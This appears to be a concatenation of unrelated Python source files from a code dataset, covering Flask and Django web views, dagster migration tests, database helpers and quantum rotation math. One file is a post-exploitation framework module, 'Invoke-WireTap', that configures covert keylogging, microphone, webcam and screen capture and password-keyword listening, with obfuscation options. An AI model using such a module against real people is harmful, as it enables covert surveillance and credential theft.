elif resp=="Blood Drive Donor":
return render_template('UDS.html', flag='delete', redirect='/deletegeneral/blood_drive_donor')
##########################################################33
elif option=="Update":
if resp=="Blood Bank":
return render_template('update_driveorbank.html', flag='blood bank', redirect="/InsertBank/DonorUpdate")
elif resp=="Blood Donor":
return render_template('update_person.html', who='Donor', redirect="/InsertPerson/DonorUpdate")
elif resp=="Blood Acceptor":
return render_template('update_person.html', who='Acceptor',redirect="/InsertPerson/AcceptorUpdate" )
elif resp=="Blood Drive":
return render_template('Update_driveorbank.html', flag='blood drive', redirect="/InsertDrive/DonorUpdate")
elif resp=="Blood Drive Donor":
return render_template('Update_driveorbank', flag='blood drive donor', redirect="/Insert_Drive_Donor/DonorUpdate")
#####################################################################
elif option=="Search":
if resp=="Blood Bank":
return render_template('create_bank.html')
elif resp=="Blood Donor":
return render_template('create_donor.html', who='Donor', redirect="/InsertPerson/Donor")
elif resp=="Blood Acceptor":
return render_template('create_donor.html', who='Acceptor',redirect="/InsertPerson/Acceptor" )
elif resp=="Blood Drive":
return render_template('blood_drive.html')
elif resp=="Blood Drive Donor":
return render_template('blood_drive_donor.html')
if __name__ == "__main__":
#main()
app.run(debug=True)
|
StarcoderdataPython
|
1683223
|
from django.http import HttpResponseForbidden, HttpResponseBadRequest, HttpResponse, JsonResponse
from django.contrib.auth import authenticate, login, logout
from bin import functions as fn
# ===================================================================
# Users (/user)
# ===================================================================
# /users/all : return a list of all users
def users_all(request):
if not fn.auth_(request): return HttpResponseForbidden()
if not fn.access_admin_(request): return HttpResponseForbidden()
try:
all_users = fn.users_all()
return JsonResponse(all_users, safe=False)
except Exception as e:
return JsonResponse({"result": str(e), "r": -1})
# /users/new?user,password : create a new user
def user_create(request):
if request.method != "POST": return HttpResponseBadRequest()
if not fn.auth_(request): return HttpResponseForbidden()
args = fn.args_(request, ["username", "password"], get=False)
if args is None: return HttpResponseBadRequest()
try:
fn.user_create(args["username"], args["password"])
except Exception as e:
return JsonResponse({"result": str(e), "r": -1})
return JsonResponse({"result": "ok", "r": 0})
# /users/<user>/remove
def user_remove(request, user):
if request.method != "POST": return HttpResponseBadRequest()
if not fn.auth_(request): return HttpResponseForbidden()
if not fn.access_admin_(request): return HttpResponseForbidden()
try:
fn.user_remove(user)
except Exception as e:
return JsonResponse({"result": str(e), "r": -1})
return JsonResponse({"result": "ok", "r": 0})
# /users/<user>/change_password?password
def user_set_password(request, user):
if request.method != "POST": return HttpResponseBadRequest()
if not fn.auth_(request): return HttpResponseForbidden()
args = fn.args_(request, {"new_password": None, "old_password": ""})
if args is None: return HttpResponseBadRequest()
if user == "self":
try:
if authenticate(username=request.user.username, password=args["old_password"]) is None:
raise Exception("Wrong password")
fn.user_set_password(request.user.username, args["new_password"])
except Exception as e:
return JsonResponse({"result": str(e), "r": -1})
else:
if not fn.access_admin_(request): return HttpResponseForbidden()
try:
fn.user_set_password(user, args["new_password"])
except Exception as e:
return JsonResponse({"result": str(e), "r": -1})
return JsonResponse({"result": "ok", "r": 0})
|
StarcoderdataPython
|
3276385
|
from __future__ import print_function
from builtins import str
from builtins import object
from lib.common import helpers
class Module(object):
def __init__(self, mainMenu, params=[]):
# Metadata info about the module, not modified during runtime
self.info = {
# Name for the module that will appear in module menus
'Name': 'Invoke-WireTap',
# List of one or more authors for the module
'Author': ['@mDoi12mdjf', '@S3cur3Th1sSh1t'],
# More verbose multi-line description of the module
'Description': ("WireTap is a .NET 4.0 project to consolidate several functions used to interact with a "
"user's hardware, including: Screenshots (Display + WebCam Imaging), Audio (Both line-in "
"and line-out), Keylogging, & Activate voice recording when the user says a keyword "
"phrase. Note: Only one method can be ran at a time."),
'Software': '',
'Techniques': ['T1123', 'T1125', 'T1056'],
# True if the module needs to run in the background
'Background': False,
# File extension to save the file as
'OutputExtension': None,
# True if the module needs admin rights to run
'NeedsAdmin': False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe': True,
# The language for this module
'Language': 'powershell',
# The minimum PowerShell version needed for the module to run
'MinLanguageVersion': '4',
# List of any references/other comments
'Comments': [
'https://github.com/djhohnstein/WireTap'
]
}
# Any options needed by the module, settable during runtime
self.options = {
# Format:
# value_name : {description, required, default_value}
'Agent': {
# The 'Agent' option is the only one that MUST be in a module
'Description': 'Agent to run on.',
'Required': True,
'Value': ''
},
'record_mic': {
'Description': 'Record audio from the attached microphone (line-in).',
'Required': False,
'Value': 'True',
},
'record_sys': {
'Description': 'Record audio from the system speakers (line-out).',
'Required': False,
'Value': '',
},
'record_audio': {
'Description': 'Record audio from both the microphone and the speakers. Default: 10s',
'Required': False,
'Value': '',
},
'capture_screen': {
'Description': "Screenshot the current user's screen.",
'Required': False,
'Value': '',
},
'capture_webcam': {
'Description': "Capture images from the user's attached webcam (if it exists).",
'Required': False,
'Value': '',
},
'keylogger': {
'Description': 'Begin logging keystrokes to a file.',
'Required': False,
'Value': '',
},
'listen_for_passwords': {
'Description': "Listens for words 'username', 'password', 'login' and 'credential', "
"and when heard, starts an audio recording for two minutes.",
'Required': False,
'Value': '',
},
'time': {
'Description': 'Time to record mic, sys, or audio. Time suffix can be s/m/h.',
'Required': False,
'Value': '10s',
},
}
self.mainMenu = mainMenu
if params:
for param in params:
# Parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
# First method: Read in the source script from module_source
module_source = self.mainMenu.installPath + "/data/module_source/collection/Invoke-WireTap.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscationCommand)
module_source = module_source.replace("module_source", "obfuscated_module_source")
try:
f = open(module_source, 'r')
except:
print(helpers.color("[!] Could not read module source path at: " + str(module_source)))
return ""
module_code = f.read()
f.close()
script = module_code
script_end = 'Invoke-WireTap -Command "'
# Add any arguments to the end execution of the script
for option, values in self.options.items():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script_end += str(option)
elif option.lower() == "time":
# if we're just adding a switch
script_end += " " + str(values['Value'])
else:
script_end += " " + str(option) + " " + str(values['Value'])
script_end += '"'
if obfuscate:
script_end = helpers.obfuscate(psScript=script_end, installPath=self.mainMenu.installPath,
obfuscationCommand=obfuscationCommand)
script += script_end
script = helpers.keyword_obfuscation(script)
return script
|
StarcoderdataPython
|
3314793
|
# 10-11
# import json
#
# number = input('\nWhat\'s your favorite number? ')
# with open('number.json', 'w') as file:
# json.dump(int(number), file)
#
# with open('number.json') as file:
# number = json.load(file)
# print("I know your favorite number! It's " + str(number) + '.')
# 10-12
# import json
#
# try:
# with open('number.json') as file:
# number = json.load(file)
# except FileNotFoundError:
# number = input('\nWhat\'s your favorite number? ')
# with open('number.json', 'w') as file:
# json.dump(int(number), file)
# else:
# print("I know your favorite number! It's " + str(number) + '.')
# 10-13
import json
def get_stored_username():
filename = 'username.json'
try:
with open(filename) as f_obj:
username = json.load(f_obj)
except FileNotFoundError:
return None
else:
return username
def get_new_username():
username = input('What is your name? ')
filename = 'username.json'
with open(filename, 'w') as f_obj:
json.dump(username, f_obj)
return username
def greet_user():
username = get_stored_username()
if username:
isRight = input("Are you " + username + '? (y/n) ')
if isRight == 'n' or isRight == 'N':
username = get_new_username()
print("We'll remember you when you come back, " + username + '!')
elif isRight == 'y' or isRight == 'Y':
print('Welcome back, ' + username + '!')
else:
print('INPUT ERROR!')
else:
username = get_new_username()
print("We'll remember you when you come back, " + username + '!')
greet_user()
|
StarcoderdataPython
|
77943
|
# pylint: disable=protected-access
import os
import re
import subprocess
import tempfile
import pytest
from dagster import AssetKey, AssetMaterialization, Output, execute_pipeline, pipeline, solid
from dagster.core.errors import DagsterInstanceMigrationRequired
from dagster.core.instance import DagsterInstance
from dagster.core.storage.tags import PARTITION_NAME_TAG, PARTITION_SET_TAG
from dagster.utils import file_relative_path
from sqlalchemy import create_engine
def test_0_7_6_postgres_pre_add_pipeline_snapshot(hostname, conn_string):
engine = create_engine(conn_string)
engine.execute("drop schema public cascade;")
engine.execute("create schema public;")
env = os.environ.copy()
env["PGPASSWORD"] = "<PASSWORD>"
subprocess.check_call(
[
"psql",
"-h",
hostname,
"-p",
"5432",
"-U",
"test",
"-f",
file_relative_path(
__file__, "snapshot_0_7_6_pre_add_pipeline_snapshot/postgres/pg_dump.txt"
),
],
env=env,
)
run_id = "d5f89349-7477-4fab-913e-0925cef0a959"
with tempfile.TemporaryDirectory() as tempdir:
with open(file_relative_path(__file__, "dagster.yaml"), "r") as template_fd:
with open(os.path.join(tempdir, "dagster.yaml"), "w") as target_fd:
template = template_fd.read().format(hostname=hostname)
target_fd.write(template)
instance = DagsterInstance.from_config(tempdir)
@solid
def noop_solid(_):
pass
@pipeline
def noop_pipeline():
noop_solid()
with pytest.raises(
DagsterInstanceMigrationRequired, match=_migration_regex("run", current_revision=None)
):
execute_pipeline(noop_pipeline, instance=instance)
# ensure migration is run
instance.upgrade()
runs = instance.get_runs()
assert len(runs) == 1
assert runs[0].run_id == run_id
run = instance.get_run_by_id(run_id)
assert run.run_id == run_id
assert run.pipeline_snapshot_id is None
result = execute_pipeline(noop_pipeline, instance=instance)
assert result.success
runs = instance.get_runs()
assert len(runs) == 2
new_run_id = result.run_id
new_run = instance.get_run_by_id(new_run_id)
assert new_run.pipeline_snapshot_id
def test_0_9_22_postgres_pre_asset_partition(hostname, conn_string):
engine = create_engine(conn_string)
engine.execute("drop schema public cascade;")
engine.execute("create schema public;")
env = os.environ.copy()
env["PGPASSWORD"] = "<PASSWORD>"
subprocess.check_call(
[
"psql",
"-h",
hostname,
"-p",
"5432",
"-U",
"test",
"-f",
file_relative_path(
__file__, "snapshot_0_9_22_pre_asset_partition/postgres/pg_dump.txt"
),
],
env=env,
)
with tempfile.TemporaryDirectory() as tempdir:
with open(file_relative_path(__file__, "dagster.yaml"), "r") as template_fd:
with open(os.path.join(tempdir, "dagster.yaml"), "w") as target_fd:
template = template_fd.read().format(hostname=hostname)
target_fd.write(template)
instance = DagsterInstance.from_config(tempdir)
@solid
def asset_solid(_):
yield AssetMaterialization(
asset_key=AssetKey(["path", "to", "asset"]), partition="partition_1"
)
yield Output(1)
@pipeline
def asset_pipeline():
asset_solid()
with pytest.raises(
DagsterInstanceMigrationRequired,
match=_migration_regex("run", current_revision="c9159e740d7e"),
):
execute_pipeline(asset_pipeline, instance=instance)
# ensure migration is run
instance.upgrade()
result = execute_pipeline(asset_pipeline, instance=instance)
assert result.success
def test_0_9_22_postgres_pre_run_partition(hostname, conn_string):
engine = create_engine(conn_string)
engine.execute("drop schema public cascade;")
engine.execute("create schema public;")
env = os.environ.copy()
env["PGPASSWORD"] = "<PASSWORD>"
subprocess.check_call(
[
"psql",
"-h",
hostname,
"-p",
"5432",
"-U",
"test",
"-f",
file_relative_path(__file__, "snapshot_0_9_22_pre_run_partition/postgres/pg_dump.txt"),
],
env=env,
)
with tempfile.TemporaryDirectory() as tempdir:
with open(file_relative_path(__file__, "dagster.yaml"), "r") as template_fd:
with open(os.path.join(tempdir, "dagster.yaml"), "w") as target_fd:
template = template_fd.read().format(hostname=hostname)
target_fd.write(template)
instance = DagsterInstance.from_config(tempdir)
@solid
def simple_solid(_):
return 1
@pipeline
def simple_pipeline():
simple_solid()
tags = {PARTITION_NAME_TAG: "my_partition", PARTITION_SET_TAG: "my_partition_set"}
with pytest.raises(
DagsterInstanceMigrationRequired,
match=_migration_regex("run", current_revision="3e0770016702"),
):
execute_pipeline(simple_pipeline, tags=tags, instance=instance)
# ensure migration is run
instance.upgrade()
result = execute_pipeline(simple_pipeline, tags=tags, instance=instance)
assert result.success
def test_0_10_0_schedule_wipe(hostname, conn_string):
engine = create_engine(conn_string)
engine.execute("drop schema public cascade;")
engine.execute("create schema public;")
env = os.environ.copy()
env["PGPASSWORD"] = "<PASSWORD>"
subprocess.check_call(
[
"psql",
"-h",
hostname,
"-p",
"5432",
"-U",
"test",
"-f",
file_relative_path(__file__, "snapshot_0_10_0_wipe_schedules/postgres/pg_dump.txt"),
],
env=env,
)
with tempfile.TemporaryDirectory() as tempdir:
with open(file_relative_path(__file__, "dagster.yaml"), "r") as template_fd:
with open(os.path.join(tempdir, "dagster.yaml"), "w") as target_fd:
template = template_fd.read().format(hostname=hostname)
target_fd.write(template)
with pytest.raises(DagsterInstanceMigrationRequired):
with DagsterInstance.from_config(tempdir) as instance:
instance.optimize_for_dagit(statement_timeout=500)
with DagsterInstance.from_config(tempdir) as instance:
instance.upgrade()
with DagsterInstance.from_config(tempdir) as upgraded_instance:
assert len(upgraded_instance.all_stored_job_state()) == 0
def test_0_10_6_add_bulk_actions_table(hostname, conn_string):
engine = create_engine(conn_string)
engine.execute("drop schema public cascade;")
engine.execute("create schema public;")
env = os.environ.copy()
env["PGPASSWORD"] = "<PASSWORD>"
subprocess.check_call(
[
"psql",
"-h",
hostname,
"-p",
"5432",
"-U",
"test",
"-f",
file_relative_path(
__file__, "snapshot_0_10_6_add_bulk_actions_table/postgres/pg_dump.txt"
),
],
env=env,
)
with tempfile.TemporaryDirectory() as tempdir:
with open(file_relative_path(__file__, "dagster.yaml"), "r") as template_fd:
with open(os.path.join(tempdir, "dagster.yaml"), "w") as target_fd:
template = template_fd.read().format(hostname=hostname)
target_fd.write(template)
with DagsterInstance.from_config(tempdir) as instance:
assert not instance.has_bulk_actions_table()
instance.upgrade()
assert instance.has_bulk_actions_table()
def _migration_regex(storage_name, current_revision, expected_revision=None):
warning = re.escape(
"Instance is out of date and must be migrated (Postgres {} storage requires migration).".format(
storage_name
)
)
if expected_revision:
revision = re.escape(
"Database is at revision {}, head is {}.".format(current_revision, expected_revision)
)
else:
revision = "Database is at revision {}, head is [a-z0-9]+.".format(current_revision)
instruction = re.escape("Please run `dagster instance migrate`.")
return "{} {} {}".format(warning, revision, instruction)
|
StarcoderdataPython
|
4804853
|
import os
import os.path
import stat
import subprocess
import sys
import pytest
@pytest.fixture
def artifact_path():
dist_dir = os.path.join(os.path.dirname(__file__), 'dist')
if not os.path.isdir(dist_dir):
raise ValueError(f"dist directory \"{dist_dir}\" does not exist")
dist_files = [dir_entry.path for dir_entry in os.scandir(dist_dir) if dir_entry.is_file()]
if len(dist_files) > 1:
raise ValueError(f"Find multiple artifacts in the \"{dist_dir}\" directory")
elif len(dist_files) == 0:
raise ValueError(f"No artifacts are found in the \"{dist_dir}\" directory")
artifact_path = dist_files[0]
artifact_mode = os.stat(artifact_path).st_mode
if not artifact_mode & stat.S_IEXEC:
os.chmod(artifact_path, artifact_mode | stat.S_IEXEC)
return artifact_path
def test_help(artifact_path):
result = subprocess.run([artifact_path, '--help'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
result.check_returncode()
def test_list_ports(artifact_path):
result = subprocess.run([artifact_path, '--list'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
result.check_returncode()
if __name__ == '__main__':
# check minimal python version
assert sys.version_info >= (3, 6)
sys.exit(pytest.main(args=[__file__]))
|
StarcoderdataPython
|
25439
|
<gh_stars>1-10
import sys
from flask_appbuilder import SQLA, AppBuilder, ModelView, Model
from flask_appbuilder.models.sqla.interface import SQLAInterface
from sqlalchemy import Column, Integer, String, ForeignKey, Table
from sqlalchemy.orm import relationship
from flask import Flask
from flask_appbuilder.actions import action
config = {
'SQLALCHEMY_DATABASE_URI': 'sqlite:///test.db',
'CSRF_ENABLED': True,
'SECRET_KEY': '\2\1thisismyscretkey\1\2\e\y\y\h',
'APP_NAME': 'Example of Filtering Many-to-many Relationships on a single field.'
}
app = Flask('single_filter_multi_value')
app.config.update(config)
db = SQLA(app)
appbuilder = AppBuilder(app, db.session)
program_registration = Table(
'program_registration',
Model.metadata,
Column('program_id', Integer, ForeignKey('program.id')),
Column('student_id', Integer, ForeignKey('student.id')))
course_registration = Table(
'course_registration',
Model.metadata,
Column('course_id', Integer, ForeignKey('course.id')),
Column('student_id', Integer, ForeignKey('student.id')))
class Teacher(Model):
id = Column(Integer, primary_key=True)
name = Column(String, nullable=False)
def __repr__(self):
return self.name
class Program(Model):
id = Column(Integer, primary_key=True)
name = Column(String, nullable=False)
def __repr__(self):
return self.name
class Student(Model):
id = Column(Integer, primary_key=True)
name = Column(String, nullable=False)
program = relationship(Program, secondary=program_registration,
backref='students')
def __repr__(self):
return self.name
class Course(Model):
id = Column(Integer, primary_key=True)
title = Column(String, nullable=False)
teacher_id = Column(Integer, ForeignKey('teacher.id'), nullable=False)
teacher = relationship(Teacher, backref='courses')
students = relationship(Student, secondary=course_registration,
backref='courses')
def __repr__(self):
return self.title
class CourseView(ModelView):
datamodel = SQLAInterface(Course)
list_columns = ['title', 'teacher']
show_columns = ['title', 'teacher']
@action("muldelete", "Delete", "Delete all Really?", "fa-rocket",
single=False)
def muldelete(self, items):
self.datamodel.delete_all(items)
self.update_redirect()
return redirect(self.get_redirect())
class ProgramView(ModelView):
datamodel = SQLAInterface(Program)
list_columns = ['name']
show_columns = ['name', 'students']
add_columns = ['name']
@action("muldelete", "Delete", "Delete all Really?", "fa-rocket",
single=False)
def muldelete(self, items):
self.datamodel.delete_all(items)
self.update_redirect()
return redirect(self.get_redirect())
class StudentView(ModelView):
datamodel = SQLAInterface(Student)
related_views = [CourseView, ProgramView]
list_columns = ['name', 'courses']
@action("muldelete", "Delete", "Delete all Really?", "fa-rocket",
single=False)
def muldelete(self, items):
self.datamodel.delete_all(items)
self.update_redirect()
return redirect(self.get_redirect())
class TeacherView(ModelView):
datamodel = SQLAInterface(Teacher)
related_views = [StudentView]
list_columns = ['name']
@action("muldelete", "Delete", "Delete all Really?", "fa-rocket",
single=False)
def muldelete(self, items):
self.datamodel.delete_all(items)
self.update_redirect()
return redirect(self.get_redirect())
db.create_all()
appbuilder.add_view(TeacherView, 'Teachers')
appbuilder.add_view(CourseView, 'Courses')
appbuilder.add_view(StudentView, 'Students')
appbuilder.add_view(ProgramView, 'Programs')
def add_data():
db.session.add(Program(name="Bachelor of Science IT"))
db.session.add(Program(name="Bachelor of Science Computer Science"))
mr_smith = Teacher(name='<NAME>')
db.session.add(mr_smith)
rod = Student(name='Rod')
jane = Student(name='Jane')
freddy = Student(name='Freddy')
db.session.add(rod)
db.session.add(jane)
db.session.add(freddy)
db.session.add(Course(title="Introduction to Programming using Pyhon",
teacher=mr_smith,
students=[rod, jane, freddy]))
db.session.add(Course(title="Mathematics I",
teacher=mr_smith,
students=[rod, jane]))
db.session.commit()
if __name__ == '__main__':
if len(sys.argv) > 1 and sys.argv[1] == '--add_data':
add_data()
else:
app.run(debug=True)
|
StarcoderdataPython
|
3321630
|
<gh_stars>0
from postgres_api import conn, cur, logger
from psycopg2 import Error
from datetime import datetime
def get_last_update(project_type):
try:
select_query = "SELECT timestamp from run_logs WHERE process_type = %s ORDER BY timestamp DESC LIMIT 1"
cur.execute(select_query, (project_type,))
mobile_records = cur.fetchall()
# print(mobile_records)
logger.info("Data was successfully selected from Logs Table")
return mobile_records
except (Exception, Error) as error:
logger.error("Error while selecting from Logs Table", error)
conn.rollback()
return None
def existance_in_document_table(file_id):
try:
select_query = "SELECT doc_id from document WHERE doc_id = %s and doc_src = %s"
cur.execute(select_query, (file_id, "GDrive"))
mobile_records = cur.fetchall()
logger.info("Data was successfully selected from Document Table")
if mobile_records != []:
logger.warn("Document {0} is already exists in Documents Table".format(file_id))
return mobile_records
except (Exception, Error) as error:
logger.error("Error while selecting from Document Table", error)
conn.rollback()
return []
def existance_in_tm_current_table(file_id):
try:
select_query = "SELECT doc_id from tm_current WHERE doc_id = %s"
cur.execute(select_query, (file_id,))
mobile_records = cur.fetchall()
logger.info("Data was successfully selected from tm_current Table")
if mobile_records != []:
logger.warning("Document {0} is already exists in tm_current Table".format(file_id))
return mobile_records
except (Exception, Error) as error:
logger.error("Error while selecting from tm_current Table", error)
conn.rollback()
return []
def logs_insert(project_type):
try:
insert_query = "INSERT INTO run_logs (process_type, timestamp) VALUES (%s,%s)"
cur.execute(insert_query, (project_type, datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S")))
conn.commit()
logger.info("Data was successfully inserted into Logs Table")
return True
except (Exception, Error) as error:
logger.error("Error while inserting into Logs Table", error)
conn.rollback()
return False
def insert_into_DOCUMENT(doc_name, timestamp):
try:
insert_query = "INSERT INTO document (doc_src, doc_id, timestamp) VALUES (%s,%s,%s)"
cur.execute(insert_query, ("GDrive", doc_name, timestamp))
conn.commit()
logger.info("Data was successfully inserted into Document Table")
# return True
except (Exception, Error) as error:
logger.error("Error while inserting into Documents", error)
conn.rollback()
def insert_into_TM_CURRENT(doc_name):
try:
insert_query = "INSERT INTO TM_CURRENT (doc_id, timestamp) VALUES (%s,%s)"
cur.execute(insert_query, (doc_name, datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S")))
conn.commit()
# logger.info("Data was successfully insert into TM_CURRENT")
# return True
except (Exception, Error) as error:
logger.error("Error while inserting into TM_CURRENT", error)
conn.rollback()
def clear_TM_CURRENT():
try:
insert_query = "TRUNCATE tm_current"
cur.execute(insert_query)
conn.commit()
logger.info("Table TM_CURRENT was successfully cleared")
# return True
except (Exception, Error) as error:
logger.error("Error while clearing TM_CURRENT", error)
conn.rollback()
def clear_DOC_SIMILARITY():
try:
insert_query = "TRUNCATE doc_similarity"
cur.execute(insert_query)
conn.commit()
logger.info("Table DOC_SIMILARITY was successfully cleared")
# return True
except (Exception, Error) as error:
logger.error("Error while clearing DOC_SIMILARITY", error)
conn.rollback()
def insert_into_DOC_PROCESSING(proc_id, doc_id, status):
try:
insert_query = "INSERT INTO doc_processing (doc_id, process_id, status) VALUES ('{0}', '{1}', '{2}')" \
.format(doc_id, proc_id, status)
cur.execute(insert_query)
conn.commit()
logger.info("Data was successfully inserted into DOC_PROCESSING Table")
except (Exception, Error) as error:
logger.error("Error while inserting into DOC_PROCESSING", error)
conn.rollback()
def insert_into_DOC_SIMILARITY(algo, d_1, d_2, similarity):
try:
insert_query = "INSERT INTO doc_similarity (algo_type, doc_id_1, doc_id_2, similarity) VALUES ('{0}', '{1}', '{2}', {3})" \
.format(algo, d_1, d_2, similarity)
cur.execute(insert_query)
conn.commit()
# print("Data was successfully inserted into DOC_SIMILARITY Table")
except (Exception, Error) as error:
logger.error("Error while inserting into DOC_SIMILARITY", error)
conn.rollback()
def close_postgres_connection():
cur.close()
conn.close()
logger.warning("Connection to PostgreSql is closed")
|
StarcoderdataPython
|
3289429
|
from retriever import benchmark_indexing, benchmark_querying
from reader import benchmark_reader
from utils import load_config
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--reader', default=False, action="store_true",
help='Perform Reader benchmarks')
parser.add_argument('--retriever_index', default=False, action="store_true",
help='Perform Retriever indexing benchmarks')
parser.add_argument('--retriever_query', default=False, action="store_true",
help='Perform Retriever querying benchmarks')
parser.add_argument('--ci', default=False, action="store_true",
help='Perform a smaller subset of benchmarks that are quicker to run')
parser.add_argument('--update_json', default=False, action="store_true",
help='Update the json file with the results of this run so that the website can be updated')
parser.add_argument('--save_markdown', default=False, action="store_true",
help='Update the json file with the results of this run so that the website can be updated')
args = parser.parse_args()
# load config
params, filenames = load_config(config_filename="config.json", ci=args.ci)
if args.retriever_index:
benchmark_indexing(**params, **filenames, ci=args.ci, update_json=args.update_json, save_markdown=args.save_markdown)
if args.retriever_query:
benchmark_querying(**params, **filenames, ci=args.ci, update_json=args.update_json, save_markdown=args.save_markdown)
if args.reader:
benchmark_reader(**params, **filenames, ci=args.ci, update_json=args.update_json, save_markdown=args.save_markdown)
|
StarcoderdataPython
|
3369645
|
import numpy as np
import quaternion
import operator
def isqrt(n):
"""
Return the integer part of the square root of the input.
(math.isqrt from Python 3.8)
"""
n = operator.index(n)
if n < 0:
raise ValueError("isqrt() argument must be nonnegative")
if n == 0:
return 0
c = (n.bit_length() - 1) // 2
a = 1
d = 0
for s in reversed(range(c.bit_length())):
# Loop invariant: (a-1)**2 < (n >> 2*(c - d)) < (a+1)**2
e = d
d = c >> s
a = (a << d - e - 1) + (n >> 2*c - e - d + 1) // a
return a - (a*a > n)
def phi_to_axis(phi):
'''
Converts an angle phi to the corresponding axis in the xy-plane
Inputs:
phi (float): counterclockwise angle from the x-axis in the xy-plane
Returns:
numpy array representing the axis in the xy-plane corresponding to angle phi
'''
x_axis = np.array([1, 0, 0])
y_axis = np.array([0, 1, 0])
return np.cos(phi) * x_axis + np.sin(phi) * y_axis
def xy_decomposition(axis, angle, theta = 0):
'''
Decompose the given rotation into a composition of rotations about axes in the xy-plane
Inputs:
axis: the axis of the rotation to be decomposed
angle: the angle of the rotation to be decomposed
theta: a degree of freedom for the xy decomposition, ranges from 0 to 2*pi
Returns:
list of 2-tuples in which the first element of each 2-tuple specifies an axis of rotation
and the second element of each 2-tuple specifies an angle of rotation
'''
#if axis is already in xy-plane, return sequence with original rotation
if abs(axis[2]) < 1e-12:
rotation_sequence = [(axis, angle)]
else:
#find a perpendicular axis with large magnitude (to minimize numerical errors)
perp_axis_1 = np.array([0, axis[2], -axis[1]])
if np.linalg.norm(perp_axis_1) < 0.7:
perp_axis_1 = np.array([-axis[2], 0, axis[1]])
if np.linalg.norm(perp_axis_1) < 0.7:
perp_axis_1 = np.array([-axis[1], axis[0], 0])
perp_axis_1 = perp_axis_1 / np.linalg.norm(perp_axis_1)
#find an axis perpendicular to both axes
perp_axis_2 = np.cross(axis, perp_axis_1)
perp_axis_2 = perp_axis_2 / np.linalg.norm(perp_axis_2)
#compute the axes of reflection for the two reflections that compose to give this rotation
reflect_1_axis = np.cos(theta) * perp_axis_1 + np.sin(theta) * perp_axis_2
reflect_2_axis = np.cos(theta + angle / 2) * perp_axis_1 + np.sin(theta + angle / 2) * perp_axis_2
#define the z-axis normal vector
z_axis = np.array([0, 0, 1])
#compose the first reflection with a reflection through the xy-plane and find the corresponding rotation
rotate_1_axis = np.cross(reflect_1_axis, z_axis)
rotate_1_axis = rotate_1_axis / np.linalg.norm(rotate_1_axis)
rotate_1_angle = 2 * np.arccos(np.dot(reflect_1_axis.T, z_axis))
#compose a reflection through the xy-plane with the second rotation and find the corresponding rotation
rotate_2_axis = np.cross(z_axis, reflect_2_axis)
rotate_2_axis = rotate_2_axis / np.linalg.norm(rotate_2_axis)
rotate_2_angle = 2 * np.arccos(np.dot(reflect_2_axis.T, z_axis))
#create a rotation sequence corresponding to these two rotations
rotation_sequence = [(rotate_1_axis, rotate_1_angle), (rotate_2_axis, rotate_2_angle)]
return rotation_sequence
def axis_switch(init_axis, final_axis):
'''
Provide the axis and angle required to rotate from one vector to another
Inputs:
init_axis: the initial axis vector to be rotated
final_axis: the target axis vector to which the initial axis vector is to be rotated
Returns:
vector and scalar representing the axis and angle of a rotation that takes init_axis to final_axis
'''
#compute the rotation axis that is perpendicular to both axes to be the axis of rotation
#compute the rotation angle as the angle between the initial axis and the final axis
rotation_axis = np.cross(init_axis, final_axis)
rotation_axis = rotation_axis / np.linalg.norm(rotation_axis)
rotation_angle = np.arccos(np.dot(init_axis.T, final_axis))
return rotation_axis, rotation_angle
def alpha_beta_decomposition(subspace_angle, gate = "X"):
'''
Given an angle and a gate, compute the two axes of the rotations and the number of rotations to make this gate
In particular, the gate is given by num_b_rotations rotations of angle subspace_angle about axis beta
followed by one rotation of angle subspace_angle about angle alpha
Inputs:
subspace_angle: the angle of rotation
gate: the gate to be obtained
Returns:
two axes alpha and beta and a number of rotations num_b_rotations
such that num_b_rotations rotations of angle subspace_angle about axis beta
followed by one rotation of angle subspace_angle about angle alpha
results in the desired gate
'''
#calculate the number of rotations required to achieve an X or Y gate (i.e., a rotation by pi)
effective_rot_angle = subspace_angle if subspace_angle <= np.pi else 2 * np.pi - subspace_angle
num_b_rotations = int(np.ceil(np.pi / effective_rot_angle)) - 1
#define two convenient angles for calculation of alpha and beta
angle1 = subspace_angle / 2
angle2 = num_b_rotations * subspace_angle / 2
#solve for the components of the axes for each gate type
if gate == "X":
#b2 is a free parameter that must have magnitude at most sqrt(1 - cos^2(angle1)/sin^2(angle2))
b2 = 0
b1 = np.cos(angle1) / np.sin(angle2)
b3 = 1 / np.sin(angle2) * np.sqrt(-1 * np.cos(angle1) ** 2 + np.sin(angle2) ** 2 - b2 ** 2 * np.sin(angle2) ** 2)
a1 = np.cos(angle2) / np.sin(angle1)
a2 = 1 / np.sin(angle1) * np.sqrt(-1 * np.cos(angle1) ** 2 + np.sin(angle2) ** 2 - b2 ** 2 * np.sin(angle2) ** 2)
a3 = -1 * b2 * np.sin(angle2) / np.sin(angle1)
elif gate == "Y":
#b1 is a free parameter that must have magnitude at most sqrt(1 - cos^2(angle1)/sin^2(angle2))
b1 = 0
b2 = np.cos(angle1) / np.sin(angle2)
b3 = 1 / np.sin(angle2) * np.sqrt(-1 * np.cos(angle1) ** 2 + np.sin(angle2) ** 2 - b1 ** 2 * np.sin(angle2) ** 2)
a1 = -1 / np.sin(angle1) * np.sqrt(-1 * np.cos(angle1) ** 2 + np.sin(angle2) ** 2 - b1 ** 2 * np.sin(angle2) ** 2)
a2 = np.cos(angle2) / np.sin(angle1)
a3 = b1 * np.sin(angle2) / np.sin(angle1)
else:
raise Exception("unsupported gate " + gate)
#synthesize the components into rotation axes alpha and beta
beta = np.array([b1, b2, b3])
alpha = np.array([a1, a2, a3])
return alpha, beta, num_b_rotations
def identity_order(n, k):
'''
Computes the order in which the subspaces should be cleaned to the identity
Inputs:
n: the total number of subspaces in the system
k: the 1-indexed number of the subspace that is to be X or Y (and not identity)
Returns:
two lists, the first of which contains the two indices of the subspaces to be cleaned first
and the second of which contains the remaining indices of the subspaces to be cleaned next
'''
#account for all subspaces from 1 to n apart from k
remaining_indices = list(range(1, k)) + list(range(k + 1, n + 1))
two_pulse_spaces = []
remaining_spaces = []
